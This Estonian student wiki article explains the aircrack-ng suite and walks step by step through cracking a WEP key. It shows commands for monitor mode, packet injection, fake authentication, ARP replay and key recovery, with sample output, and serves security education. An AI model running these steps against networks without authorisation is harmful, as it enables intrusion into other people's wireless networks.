Aircrack

From ICO wiki
Jump to navigationJump to search

Sissejuhatus

Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit, demonstreerides üht näitelahendust.

Eeldused

  • Elementaarne käsurea kasutamisoskus
  • Teadmised WiFi, WEP, WPA/WPA2 kohta
  • Võrgus vähemalt 1 aktiivne klient
  • Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
  • Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
  • aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: siit ja siit)

WiFi adapteri vaatamine[1]:

lspci -nn | grep Network

või rohkema informatsiooni saamiseks[2]:

lshw -class network

Tulemuseks saame midagi sarnast:

02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)

või

*-network
       description: Wireless interface
       product: Centrino Advanced-N 6205 [Taylor Peak]
       vendor: Intel Corporation
       physical id: 0
       bus info: pci@0000:02:00.0
       logical name: wlan0
       version: 34
       serial: 6c:88:14:1d:29:c4
       width: 64 bits
       clock: 33MHz
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
       resources: irq:32 memory:f7d00000-f7d01fff
Pane tähele! Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone.

Üldkirjeldus

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm[3]. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu[4]:

  • airodump-ng - programm pakettide püüdmiseks
  • aireplay-ng - programm pakettide „süstimiseks“
  • aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
  • airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

Süntaks

aircrack-ng süntaks näeb välja järgmine[5]:

aircrack-ng [võti] <püütud fail(id)>

Nimekirja võtmetele leiab SIIT!

Installeerimine

Uuendame repositooriumi:

sudo apt-get update

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt[6]:

sudo apt-get install aircrack-ng

WEP võtme murdmine

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja[7]:

  • Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
  • BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
  • ESSID (võrgu nimi): teddy
  • Pääsupunkti kanal: 9
  • Raadiovõrgu liides (ingl. k Wireless interface): ath0

Eesmärk

Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks[8].

Lühikesed tegevussammud

Lühidalt sammudest, mida tegema asume[9]:
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)
2. Testime „süstimise“ suutlikkust pääsupunktile
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid

Näide WEP võtme lahti murdmise protsessist

Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi[10]
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:

airmon-ng stop ath0

Tulemus:

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Kontrolli, kas kõik athX liidesed on ikka suletud:

iwconfig

Tulemus:

lo        no wireless extensions.

eth0      no wireless extensions.

wifi0     no wireless extensions.

Märge: Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval airmon-ng stop athX käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:

airmon-ng start wifi0 9

Pane tähele! Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:

 Interface       Chipset         Driver
 
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:

iwconfig

Tulemus:

lo        no wireless extensions.

wifi0     no wireless extensions.

eth0      no wireless extensions.

ath0      IEEE 802.11g  ESSID:""  Nickname:""
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  
       Retry:off   RTS thr:off   Fragment thr:off
       Encryption key:off
       Power Management:off
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0

Kontrolli: Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!


Samm 2: Testime „süstimise“ suutlikkust pääsupunktile[11]
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:

aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0

Selgituseks:
-9 - “süstimise” test
-e teddy – raadiovõrgu nimi
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress
ath0 – raadiovõrgu liides

Tulemus:

09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35  Trying broadcast probe requests...
09:23:35  Injection is working!
09:23:37  Found 1 AP 

09:23:37  Trying directed probe requests...
09:23:37  00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39  30/30: 100%

Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.


Samm 3: Avada airodump-ng pakettide püüdmiseks[12]
Ava uus konsooliaken ja sisesta:

airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0

Selgituseks:
-c 9 – raadiovõrgu kanal
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:

CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 
                                                                                                              
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                            
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           
                                                                                                            
 BSSID              STATION            PWR  Lost  Packets  Probes                                             
                                                                                                            
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  



Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga[13]
Ava uus konsooliaken ja sisesta:

aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Selgitus:
-1 – võlts autentimine
0 – kordusühendus(t)e aeg sekundites
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress

Õnnestumise korral on tulemus:

18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful :-)

Ebaõnnestumise korral on tulemus:

8:28:02  Sending Authentication Request
18:28:02  Authentication successful
18:28:02  Sending Association Request
18:28:02  Association successful :-)
18:28:02  Got a deauthentication packet!
18:28:05  Sending Authentication Request
18:28:05  Authentication successful
18:28:05  Sending Association Request
18:28:10  Sending Authentication Request
18:28:10  Authentication successful
18:28:10  Sending Association Request



Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis[14]
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:

aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Tulemus:

Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...



Samm 6: Ava aircrack-ng salasõna lahti murdmiseks[15]
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:

aircrack-ng -b 00:14:6C:7E:40:80 output*.cap

Selgitus: -b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”

Tulemus:

                             [00:03:06] Tested 674449 keys (got 96610 IVs)

KB    depth   byte(vote)
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) 
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) 
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) 
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) 

                      KEY FOUND! [ 12:34:56:78:90 ] 
     Probability: 100%

Kokkuvõte

aircrack-ng on lihtne ja käepärane vahend, millega lahti murda ilma suurema vaevata WiFi-võrkude paroole. Õppe-eesmärgil on kindlasti vägagi asjakohane antud tööriistaga tutvust teha, sest üpris kiirelt saab selgeks, kuivõrd lihtne on tegelikult kellegi koduvõrku tungida manipuleerides andmepakettidega ja kasutades selleks vaid ~15 käsku.

Kasutatud kirjandus

Autor

Kelly Tragel [ISa 21]
Viimati muudetud: 25.05.2015

Versioonide ajalugu

Kuupäev Versioon
25.05.2015 1.0